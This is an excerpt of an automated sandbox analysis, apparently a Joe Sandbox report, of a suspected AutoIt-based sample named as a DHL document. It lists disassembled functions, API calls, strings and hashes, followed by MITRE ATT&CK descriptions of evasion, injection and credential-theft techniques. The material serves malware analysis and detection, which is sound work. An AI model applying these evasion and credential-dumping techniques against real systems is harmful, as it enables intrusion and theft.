Part of subcall function 003F9CB3: _wcslen.LIBCMT ref: 003F9CBD

CharUpperBuffW.USER32(?,?,?), ref: 00456CB6
_wcslen.LIBCMT ref: 00456CC2

Strings

STOP, xrefs: 00456CBC, 00456CC1

Memory Dump Source

Source File: 00000000.00000002.1267738006.00000000003F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true

Associated: 00000000.00000002.1267721473.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267840670.00000000004BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267861882.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3f0000_DHL-DOC83972025-1.jbxd

Similarity

API ID: _wcslen$BuffCharUpper
String ID: STOP
API String ID: 1256254125-2411985666
Opcode ID: a5beb92ab42562fd2a552c6d71bf3792904a36609ab94fb0b506b4c8ccc247f2
Instruction ID: c72283bdb6e785cd5a50e9544192f77368ef9428af47e7499e6fb7ccb397521d
Opcode Fuzzy Hash: a5beb92ab42562fd2a552c6d71bf3792904a36609ab94fb0b506b4c8ccc247f2
Instruction Fuzzy Hash: 63012B326005268BCB129FBDDC809BF73B4EF60711782093AEC5297292FB39D808C654

Function 00451BD8 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50windowCOMMON

Download Yara Rule

APIs

Part of subcall function 003F9CB3: _wcslen.LIBCMT ref: 003F9CBD

Part of subcall function 00453CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00453CCA

SendMessageW.USER32(?,00000180,00000000,?), ref: 00451C46

Strings

ComboBox, xrefs: 00451BE5
ListBox, xrefs: 00451C10

Memory Dump Source

Source File: 00000000.00000002.1267738006.00000000003F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true

Associated: 00000000.00000002.1267721473.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267840670.00000000004BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267861882.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3f0000_DHL-DOC83972025-1.jbxd

Similarity

API ID: ClassMessageNameSend_wcslen
String ID: ComboBox$ListBox
API String ID: 624084870-1403004172
Opcode ID: 3ec74e24040678cb29cba38bfa1a77b81c0e2d9878ac671691b677db9cf95c27
Instruction ID: 5321e339e67e64625824bc12bd4a71fb9a5194f200638ddf89c1eebbfba71e29
Opcode Fuzzy Hash: 3ec74e24040678cb29cba38bfa1a77b81c0e2d9878ac671691b677db9cf95c27
Instruction Fuzzy Hash: 9701A77568110867CF16EBA0CA51BFF77A89F11381F14001BED0677292EA299E0CC6B9

Function 00451C5C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49windowCOMMON

Download Yara Rule

APIs

Part of subcall function 003F9CB3: _wcslen.LIBCMT ref: 003F9CBD

Part of subcall function 00453CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00453CCA

SendMessageW.USER32(?,00000182,?,00000000), ref: 00451CC8

Strings

ComboBox, xrefs: 00451C69
ListBox, xrefs: 00451C94

Memory Dump Source

Source File: 00000000.00000002.1267738006.00000000003F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true

Associated: 00000000.00000002.1267721473.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267840670.00000000004BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267861882.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3f0000_DHL-DOC83972025-1.jbxd

Similarity

API ID: ClassMessageNameSend_wcslen
String ID: ComboBox$ListBox
API String ID: 624084870-1403004172
Opcode ID: 48f6816dc4d500f6bfaeb3243107f436f0265aa736101e95eda48cc63cad1fb8
Instruction ID: b6c09de2dc953b272af3a22bfd5aef36263feba1326fdbee55ae27234e447657
Opcode Fuzzy Hash: 48f6816dc4d500f6bfaeb3243107f436f0265aa736101e95eda48cc63cad1fb8
Instruction Fuzzy Hash: DE01A77168011867CB06EBA1CA01BFF77A89B11381F14001BBD0177292EA299F0CD679

Function 0040A4D6 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 47COMMON

Download Yara Rule

APIs

__Init_thread_footer.LIBCMT ref: 0040A529

Part of subcall function 003F9CB3: _wcslen.LIBCMT ref: 003F9CBD

Strings

3yD, xrefs: 0040A545, 0040A54D, 0040A552
,%L, xrefs: 0040A509

Memory Dump Source

Source File: 00000000.00000002.1267738006.00000000003F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true

Associated: 00000000.00000002.1267721473.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267840670.00000000004BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267861882.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3f0000_DHL-DOC83972025-1.jbxd

Similarity

API ID: Init_thread_footer_wcslen
String ID: ,%L$3yD
API String ID: 2551934079-3642919373
Opcode ID: d0b809af134bc98950cd52a3f4e90ef4639bdc8077e5f0154f7a69a32d61aefd
Instruction ID: 5ab62c6bd05ac69ddcd140697fe3376f5014cf52d054cb5af948ff70202326f7
Opcode Fuzzy Hash: d0b809af134bc98950cd52a3f4e90ef4639bdc8077e5f0154f7a69a32d61aefd
Instruction Fuzzy Hash: D301D431600714A7C601B7699D56FAE3354AB05710F50407BF6016B2C2DEE86D41869F

Function 00488172 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 40processCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,004C3018,004C305C), ref: 004881BF
CloseHandle.KERNEL32 ref: 004881D1

Strings

\0L, xrefs: 0048818A

Memory Dump Source

Source File: 00000000.00000002.1267738006.00000000003F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true

Associated: 00000000.00000002.1267721473.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267840670.00000000004BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267861882.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3f0000_DHL-DOC83972025-1.jbxd

Similarity

API ID: CloseCreateHandleProcess
String ID: \0L
API String ID: 3712363035-986396046
Opcode ID: 35cf3ea13c74382cb6998ddb586b3a8a126fab2cfdd7352e71f3decc0878cc01
Instruction ID: da257b87bb91ff51fcf37b2d2a1594b93bdbb2c958f9b001e785ba8557aedd20
Opcode Fuzzy Hash: 35cf3ea13c74382cb6998ddb586b3a8a126fab2cfdd7352e71f3decc0878cc01
Instruction Fuzzy Hash: A1F05EB6640304BAE2606F62AC45FBB7A5CEB05756F00843ABF08D51A2D6798E5093BC

Function 0047747E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00477493
_wcslen.LIBCMT ref: 004774B9

Strings

3, 3, 16, 1, xrefs: 00477483

Memory Dump Source

Source File: 00000000.00000002.1267738006.00000000003F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true

Associated: 00000000.00000002.1267721473.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267840670.00000000004BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267861882.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3f0000_DHL-DOC83972025-1.jbxd

Similarity

API ID: _wcslen
String ID: 3, 3, 16, 1
API String ID: 176396367-3042988571
Opcode ID: 0e076b82779361c2bb68f1a79e6eb005a6d962856891511f7669d524e1ba6d63
Instruction ID: 36233daa3f9898c654f70fd0fcf7ceb5be08fc8c5b6e64ef883a8eb51223dc5c
Opcode Fuzzy Hash: 0e076b82779361c2bb68f1a79e6eb005a6d962856891511f7669d524e1ba6d63
Instruction Fuzzy Hash: 1FE02B52214220109231127B9CC1AFF56C9DFC57A0754182FF989C2376EA9C8DD193A8

Function 00450B15 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 28windowCOMMON

Download Yara Rule

APIs

MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 00450B23

Strings

AutoIt, xrefs: 00450B17
Error allocating memory., xrefs: 00450B1C

Memory Dump Source

Source File: 00000000.00000002.1267738006.00000000003F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true

Associated: 00000000.00000002.1267721473.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267840670.00000000004BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267861882.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3f0000_DHL-DOC83972025-1.jbxd

Similarity

API ID: Message
String ID: AutoIt$Error allocating memory.
API String ID: 2030045667-4017498283
Opcode ID: fbcee6404fba7d28c64fa9b4c09784c7d6f7f3f7a6166c8e455df597eea4c6cd
Instruction ID: 869d1843a7365dc1a8f51508c66bf949824a20061e35050d80445225caa36c0b
Opcode Fuzzy Hash: fbcee6404fba7d28c64fa9b4c09784c7d6f7f3f7a6166c8e455df597eea4c6cd
Instruction Fuzzy Hash: 27E0923124430826D22037957C43F8D7A848F05B15F20087BFB58695C38AF9649406FD

Function 00410D42 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22COMMON

Download Yara Rule

APIs

Part of subcall function 0040F7C9: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,00410D71,?,?,?,003F100A), ref: 0040F7CE

IsDebuggerPresent.KERNEL32(?,?,?,003F100A), ref: 00410D75
OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,003F100A), ref: 00410D84

Strings

ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00410D7F

Memory Dump Source

Source File: 00000000.00000002.1267738006.00000000003F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true

Associated: 00000000.00000002.1267721473.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267840670.00000000004BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267861882.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3f0000_DHL-DOC83972025-1.jbxd

Similarity

API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString
String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
API String ID: 55579361-631824599
Opcode ID: e0cd60ce23fa2ecb8f36239a59c21b3e263680f1713eb660d56893c8d6122463
Instruction ID: c4277ac6cd3ab9bb44b547bbcadcbf513f2423766d1c8734ad5e2c3276531fa6
Opcode Fuzzy Hash: e0cd60ce23fa2ecb8f36239a59c21b3e263680f1713eb660d56893c8d6122463
Instruction Fuzzy Hash: 30E065742003418BD3709FBDE4447567BE0AB04744F004D7FE485C6661DBF8E4888BA9

Function 0040E398 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 21COMMON

Download Yara Rule

APIs

__Init_thread_footer.LIBCMT ref: 0040E3D5

Strings

8%L, xrefs: 0040E3CA
0%L, xrefs: 0040E3B5

Memory Dump Source

Source File: 00000000.00000002.1267738006.00000000003F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true

Associated: 00000000.00000002.1267721473.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267840670.00000000004BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267861882.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3f0000_DHL-DOC83972025-1.jbxd

Similarity

API ID: Init_thread_footer
String ID: 0%L$8%L
API String ID: 1385522511-1843137276
Opcode ID: 0f7adedca6ebbddbdec51a2c67c4fa9d5de1fa10f6ea186bfbbcf27f1e1e70ea
Instruction ID: 10d0eae6355482df773069b516a3310d1c73e7b1f18e7878440c28dfc4b59d9e
Opcode Fuzzy Hash: 0f7adedca6ebbddbdec51a2c67c4fa9d5de1fa10f6ea186bfbbcf27f1e1e70ea
Instruction Fuzzy Hash: B4E02631404D20EBC644971AFA54E8B3751AB05324B9005BFE912DB2D19FFCA881864D

Function 00463017 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 18COMMON

Download Yara Rule

APIs

GetTempPathW.KERNEL32(00000104,?,00000001), ref: 0046302F
GetTempFileNameW.KERNEL32(?,aut,00000000,?), ref: 00463044

Strings

aut, xrefs: 00463038

Memory Dump Source

Source File: 00000000.00000002.1267738006.00000000003F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true

Associated: 00000000.00000002.1267721473.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267840670.00000000004BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267861882.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3f0000_DHL-DOC83972025-1.jbxd

Similarity

API ID: Temp$FileNamePath
String ID: aut
API String ID: 3285503233-3010740371
Opcode ID: 3cea96de7a3df90bc702ffe997299be339f960b961d6c14e78d223247a584d19
Instruction ID: f912b82e12f10efe338c51d993a90e7a0776d82cb6828ee697e7147ce3013bc1
Opcode Fuzzy Hash: 3cea96de7a3df90bc702ffe997299be339f960b961d6c14e78d223247a584d19
Instruction Fuzzy Hash: DFD05E7290032867DA20A7A4AC4EFCB3A6CDB05750F0006A2B655E20D1DAB49984CBE4

Function 0044D21C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 17timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(?), ref: 0044D220

Strings

X64, xrefs: 0044D2A8
%.3d, xrefs: 0044D22B

Memory Dump Source

Source File: 00000000.00000002.1267738006.00000000003F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true

Associated: 00000000.00000002.1267721473.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267840670.00000000004BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267861882.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3f0000_DHL-DOC83972025-1.jbxd

Similarity

API ID: LocalTime
String ID: %.3d$X64
API String ID: 481472006-1077770165
Opcode ID: b7ec393e3a1cfec2d5cb17c0ecd44d28c060e3016eae38446b5c684628432f47
Instruction ID: 41b13a4bfb4db8a0a1ca279ee16640d4413be2f21cfbd5ce45bb72d9b4e9f8bb
Opcode Fuzzy Hash: b7ec393e3a1cfec2d5cb17c0ecd44d28c060e3016eae38446b5c684628432f47
Instruction Fuzzy Hash: A6D01271C08109EADB9096D0DC499B9B3BCBB18301F6084F7F806A1080D67CD50AAB6B

Function 00482356 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON

Download Yara Rule

APIs

FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0048236C
PostMessageW.USER32(00000000), ref: 00482373

Part of subcall function 0045E97B: Sleep.KERNEL32 ref: 0045E9F3

Strings

Shell_TrayWnd, xrefs: 00482365

Memory Dump Source

Source File: 00000000.00000002.1267738006.00000000003F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true

Associated: 00000000.00000002.1267721473.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267840670.00000000004BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267861882.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3f0000_DHL-DOC83972025-1.jbxd

Similarity

API ID: FindMessagePostSleepWindow
String ID: Shell_TrayWnd
API String ID: 529655941-2988720461
Opcode ID: 1d23d2627472f676ef8bcec9cb10a70fe0cf15fc92ff182b941620b284c292e1
Instruction ID: b14a1ba4671a0685fec3fd162f3559e034165f786b7be58066e99570eb128328
Opcode Fuzzy Hash: 1d23d2627472f676ef8bcec9cb10a70fe0cf15fc92ff182b941620b284c292e1
Instruction Fuzzy Hash: 9ED0A932380310BAE668A3319C4FFCA66049B00B00F10092A7601AA0D1C8B8A8058B2C

Function 00482322 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON

Download Yara Rule

APIs

FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0048232C
PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 0048233F

Part of subcall function 0045E97B: Sleep.KERNEL32 ref: 0045E9F3

Strings

Shell_TrayWnd, xrefs: 00482325

Memory Dump Source

Source File: 00000000.00000002.1267738006.00000000003F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true

Associated: 00000000.00000002.1267721473.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267840670.00000000004BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267861882.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3f0000_DHL-DOC83972025-1.jbxd

Similarity

API ID: FindMessagePostSleepWindow
String ID: Shell_TrayWnd
API String ID: 529655941-2988720461
Opcode ID: b7b262553f65fb67b2463da8379f08ce7c2362fd3c30e2ac9042e5b9bef5c53b
Instruction ID: 0d71512fa325f669820b90115187d654578d191bf0ad3af7a0155e1ea1293dd2
Opcode Fuzzy Hash: b7b262553f65fb67b2463da8379f08ce7c2362fd3c30e2ac9042e5b9bef5c53b
Instruction Fuzzy Hash: EDD0A932380310B6E668A3319C4FFCA6A049B00B00F10092A7605AA0D1C8B8A8058B28

Description:	Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access, network devices, and remote desktop.Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
Tactics:	Defense Evasion, Initial Access, Persistence, Privilege Escalation
Data Sources:	Logon Session: Logon Session Creation, Logon Session: Logon Session Metadata, User Account: User Account Authentication
Platforms:	Azure AD, Containers, Google Workspace, IaaS, Linux, macOS, Network, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in an attempt to elevate privileges. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Security constructs such as permission levels will often hinder access to information and use of certain techniques, so adversaries will likely need to perform privilege escalation to include use of software exploitation to circumvent those restrictions.
Tactics:	Privilege Escalation
Data Sources:	Driver: Driver Load, Process: Process Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may circumvent mechanisms designed to control elevate privileges to gain higher-level permissions. Most modern systems contain native elevation control mechanisms that are intended to limit privileges that a user can perform on a machine. Authorization has to be granted to specific users in order to perform tasks that can be considered of higher risk. An adversary can perform several methods to take advantage of built-in control mechanisms in order to escalate privileges on a system.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Modification, Windows Registry: Windows Registry Key Modification
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., Valid Accounts ).
Tactics:	Discovery
Data Sources:	Command: Command Execution, File: File Access, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
